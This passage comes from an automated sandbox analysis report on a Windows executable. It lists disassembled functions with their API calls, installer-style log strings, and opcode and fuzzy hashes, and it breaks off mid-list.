                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringWritelstrcpyn
                                          • String ID: <RM>$BasicsCommunication$WriteINIStr: wrote [%s] %s=%s in %s
                                          • API String ID: 247603264-1988542485
                                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                          Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                          APIs
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                          • API String ID: 3156913733-2180253247
                                          • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                          • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                          Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: nsa
                                          • API String ID: 1716503409-2209301699
                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                          Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                          • String ID: HideWindow
                                          • API String ID: 1249568736-780306582
                                          • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                          • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                          Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                          Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                          Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                          Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                          Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                          • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                          • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                          • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                          Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                          • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                          • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                          • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                          Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree
                                          • String ID:
                                          • API String ID: 3394109436-0
                                          • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                          • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                          • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                          • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                          Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                          • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                          • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                          • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                          Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                          Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                          • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                          • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                          Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                          Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Char$Next$CreateDirectoryPrev
                                          • String ID:
                                          • API String ID: 4115351271-0
                                          • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                          • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                          • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                          • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                          Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
